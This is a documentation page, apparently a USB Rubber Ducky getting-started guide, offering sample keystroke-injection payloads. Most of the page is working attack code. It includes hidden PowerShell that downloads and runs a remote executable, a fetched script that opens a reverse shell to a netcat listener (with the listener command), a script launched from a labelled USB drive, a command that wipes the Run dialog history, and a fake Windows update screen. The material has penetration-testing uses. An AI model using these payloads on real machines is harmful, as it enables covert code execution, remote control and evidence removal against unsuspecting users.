Search…
Getting Started
The Ducky Script Language
Guides
Sample Payloads
Hundreds if not thousands of payloads exist for the USB Rubber Ducky. Typically they are shared on the USB Rubber Ducky forums or wiki.
In this final chapter of the getting started guide we'll list a few extremely short yet powerful payloads to help you get started.
Download and Run an Executable
1
DELAY 3000
2
GUI r
3
DELAY 200
4
STRING powershell -NoP -NonI -W Hidden -Exec Bypass “IEX (New-Object System.Net.WebClient).DownloadFile(‘http://darren.kitchen/calc.txt’,\”$env:temp\calc.exe\”); Start-Process \”$env:temp\calc.exe\””
5
ENTER
Copied!
Powershell Reverse Shell
1
DELAY 3000
2
GUI r
3
DELAY 100
4
STRING powershell “IEX (New-Object Net.WebClient).DownloadString(‘https://mywebserver/p.ps1’);”
5
ENTER
Copied!
Host the following as
p.ps1 on your web server for a reverse shell. Just be sure to configure the IP address and port of your netcat listener.1
$sm=(New-Object Net.Sockets.TCPClient(“hostofnetcatlistener”, 4444)).GetStream(); [byte[]]$bt=0..65535|%{0}; while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){; $d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i); $st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1)); $sm.Write($st,0,$st.Length)}
Copied!
Finally, on the listening host use netcat to receive the shell with:
1
nc -l -p 4444
Copied!
Run a Script from a USB Drive
1
DELAY 3000
2
GUI r
3
DELAY 100
4
STRING powershell -NoP -NonI -W Hidden -Exec Bypass “$uP = Get-WMIObject Win32_Volume | ? { $_.Label -eq ‘DK’ } | select name; cd $uP.name; .\p.ps1”
5
ENTER
Copied!
The above payload looks for a USB drive with the label “
DK” and executes the powershell file “p.ps1” from the root of the drive. Clear the Run Dialog History
1
DELAY 3000
2
GUI r
3
DELAY 100
4
STRING powershell “Remove-ItemProperty -Path ‘HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU’ -Name ‘*’ -ErrorAction SilentlyContinue”
5
ENTER
Copied!
Full Screen Windows 10 Update
1
DELAY 3000
2
GUI r
3
DELAY 100
4
STRING https://fakeupdate.net/win10ue/
5
ENTER
6
DELAY 3000
7
F11
Copied!
For continued reading, you are encouraged to join the Hak5 community – a vibrant community of creative developers, enthusiasts and penetration testers. Welcome!